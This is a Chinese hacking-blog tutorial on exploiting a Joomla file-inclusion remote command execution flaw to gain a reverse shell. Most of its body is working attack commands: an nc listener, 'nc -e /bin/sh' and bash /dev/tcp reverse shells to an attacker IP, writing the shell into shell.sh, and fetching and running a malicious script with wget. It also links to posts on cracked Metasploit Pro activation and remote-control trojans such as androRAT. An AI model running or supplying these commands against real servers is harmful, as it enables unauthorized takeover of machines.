图片[1]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

相关阅读

我们之前讲过反弹shell(亦称反向shell,英文reverse shell)的原理

【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-自由者联盟

基于上面的原理,我们也分享了多期实战的视频

Metasploit Pro 2022 最新专业版离线激活方法及工具下载-自由者联盟
如何通过发送一个PDF文件 远程控制整台计算机?-自由者联盟
如何远程控制任意安卓设备2.0(androRAT)-自由者联盟
Metasploit Pro 2022 最新专业版离线激活方法及工具下载-自由者联盟
如何通过一个exe文件远程控制整台计算机?-自由者联盟

以及前几天分享的0day均是通过该原理

【视频讲解】黑客常用的远程命令执行实战及演示-自由者联盟

视频讲解

我们今天给大家分享joomla CMS系统文件包含、远程代码执行的漏洞,当我们发现一个可以执行命令的URL路径时,我们可以尝试通过直接执行反弹shell、也可以通过echo将其输出到文件,再执行文件,如果上述方法都不行的时候?我们还可以尝试通过wget或者curl命令来从网站上下载恶意脚本到本地,完成恶意脚本的执行,然后让服务器主动连接我们的监听端口,最终控制整台服务器!

图文讲解

监听端口等待反弹Shell连接

nc -nlvp 4444

通用思路

当发现文件包含可以完成命令执行的时候,我们可以考虑通过下面三种方式来执行反弹shell的脚本

  • 直接运行脚本
  • echo生成脚本文件
  • wget/Curl下载脚本文件

直接运行脚本

nc -e /bin/sh 192.168.0.192 4444
图片[2]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog
bash -i >&  /dev/tcp/192.168.0.192/4444 0>&1
图片[3]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

echo生成脚本文件

图片[4]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

生成shell.sh

echo 'bash -i >& /dev/tcp/192.168.0.192/4444 0>&1' > shell.sh

然后给执行的权限

chmod 777 shell.sh

最后运行脚本

bash shell.sh

wget/Curl下载脚本文件

这里我们事先在Kali linux上传好我们的恶意脚本,在目标系统中使用wget命令从Kali linux下载shell.sh这个文件

wget 192.168.0.192/shell.sh
图片[5]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

为了确保文件正常下载,我们还可以使用下面命令查看脚本文件

cat shell.sh
图片[6]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

然后给文件运行权限

chmod 777 shell.sh
图片[7]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

最终运行恶意脚本

bash shell.sh
图片[8]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

然后我们从Kali linux上就可以接管这台机器的终端了

图片[9]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

常见的反弹shell在线生成

很多网友可能会疑惑了,反弹shell的命令有没有快捷生成的工具?这里当然是有了

图片[10]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

当然除了在线生成,我们还可以通过浏览器插件,之前也讲过

黑客必备的Chrome浏览器插件——Hacktool

图片[11]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容